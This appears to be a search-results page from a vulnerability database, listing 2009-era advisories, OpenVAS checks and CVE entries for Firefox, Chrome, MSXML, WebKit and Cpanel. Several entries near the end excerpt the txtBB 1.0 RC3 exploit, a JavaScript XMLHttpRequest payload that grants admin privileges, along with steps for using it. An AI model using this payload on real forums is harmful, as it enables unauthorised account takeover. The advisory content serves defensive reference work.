845 matches found
Ubuntu: Security Advisory (USN-690-3)
The remote host is missing an update for the ...
Cpanel File Manager Cross Site Scripting
Cpanel File Manager XSS Vulnerability. Synopsis: Cpanel (www.cpanel.net) has two file manager applications, a standard one and a legacy one, to manage files. Both of them are vulnerable to XSS attacks. File names are presented unescaped, so an attacker can craft a malicious file name to execute...
Mozilla Firefox Multiple Vulnerabilities (Feb 2009) - Windows
Mozilla Firefox browser is prone to multiple vulnerabilities. ...
Mozilla Seamonkey Multiple Vulnerabilities Feb-09 (Windows)
The host is installed with Mozilla Seamonkey browser and is prone to multiple vulnerabilities. OpenVAS Vulnerability Test $Id: secpodseamonkeymultvulnfeb09win.nasl 5122 2017-01-27 12:16:00Z teissa $ Mozilla Seamonkey Multiple Vulnerabilities Feb-09 Windows Authors: Sharath S Copyright: Copyright ...
Mozilla Firefox Multiple Vulnerabilities Feb-09 (Linux)
The host is installed with Mozilla Firefox browser and is prone to multiple vulnerabilities. OpenVAS Vulnerability Test $Id: secpodfirefoxmultvulnfeb09lin.nasl 5055 2017-01-20 14:08:39Z teissa $ Mozilla Firefox Multiple Vulnerabilities Feb-09 Linux Authors: Sharath S Copyright: Copyright c 2009...
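Microsoft XML Core Services XMLHttpRequest SetCookie2 Header Information Disclosure Vulnerability
BUGTRAQ ID: 33803 CVE(CAN) ID: CVE-2009-0419 Microsoft XML Core Services (MSXML) allows users of JScript, VBScript and Visual Studio 6.0 to develop XML-based applications that interoperate with other applications conforming to the XML 1.0 standard. Microsoft XML Core Services does not properly restrict web pages' access to the Set-Cookie2 HTTP response header, so a remote attacker can bypass the HTTPOnly protection mechanism through XMLHttpRequest calls and read sensitive information. Microsoft XML Core Services 6.0...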
Microsoft XML Core Service Information Disclosure Vulnerability
This host is installed with Microsoft XML Core Service and is prone to information disclosure vulnerability. OpenVAS Vulnerability Test $Id: secpodmsxmlcoresvcinfodiscvuln.nasl 16112 2009-02-18 12:40:24Z feb$ Microsoft XML Core Service Information Disclosure Vulnerability Update by Antu sanadi on...
FreeBSD : firefox -- multiple vulnerabilities (8b491182-f842-11dd-94d9-0030843d3802)
Mozilla Foundation reports: MFSA 2009-06: Directives to not cache pages ignored; MFSA 2009-05: XMLHttpRequest allows reading HTTPOnly cookies; MFSA 2009-04: Chrome privilege escalation via local .desktop files; MFSA 2009-03: Local file stealing with SessionStore; MFSA 2009-02: XSS using a chrome XBL...
txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit
No description provided by source. txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit By cOndemned Greetz: ZaBeaTy, sid.psycho, Alfons Luja, vCore, irk4z & str0ke ; Exploitation: 1. Create an account 2. Go to http://host/txtbb10RC3path/index.php?type=account 3. Put exploit code...
Design/Logic Flaw
xml/XMLHttpRequest.cpp in WebCore in WebKit before r38566 does not properly restrict access from web pages to the (1) Set-Cookie and (2) Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly...
CVE-2008-6059
xml/XMLHttpRequest.cpp in WebCore in WebKit before r38566 does not properly restrict access from web pages to the (1) Set-Cookie and (2) Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly...
Mozilla Foundation Security Advisory 2009-05
Mozilla Foundation Security Advisory 2009-05 Title: XMLHttpRequest allows reading HTTPOnly cookies Impact: Low Announced: February 3, 2009 Reporter: Wladimir Palant Products: Firefox, SeaMonkey Fixed in: Firefox 3.0.6 SeaMonkey 1.1.15 Description Developer and Mozilla community member Wladimir...
CVE-2008-6059
CVE-2008-6059 affects WebKit’s WebCore (XMLHttpRequest.cpp) prior to r38566. The vulnerability allows remote attackers to read cookie data via XMLHttpRequest by not properly restricting web-page access to the Set-Cookie and Set-Cookie2 response headers, related to HTTPOnly protections. Impact is ...
Google Chrome Multiple Vulnerabilities (Feb-09)
This host is installed with Google Chrome and is prone to multiple vulnerabilities. OpenVAS Vulnerability Test $Id: gbgooglechromemultvuln.nasl 4869 2016-12-29 11:01:45Z teissa $ Google Chrome Multiple Vulnerabilities Feb-09 Authors: Sujit Ghosal Copyright: Copyright c 2009 Greenbone Networks Gmb...
Google Chrome Multiple Vulnerabilities (Feb 2009)
Google Chrome is prone to multiple vulnerabilities. ...
txtBB 1.0 RC3 - HTML/JS Injection / Arbitrary Add Admin Privileges
var req = new XMLHttpRequest(); req.open('POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false); req.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');...
txtBB 1.0 RC3 Injection
var req = new XMLHttpRequest(); req.open('POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false); req.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); req.send('signature=&avatar=&type=3&password=&submit=Zapisz');...
txtBB 1.0 RC3 - HTML/JS Injection / Arbitrary Add Admin Privileges
var req = new XMLHttpRequest(); req.open('POST', 'admin.php?action=users&type=edit&login=USERNICK&save=1', false); req.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); req.send('signature=&avatar=&type=3&password=&submit=Zapisz'); milw0rm.com 2009-02-05...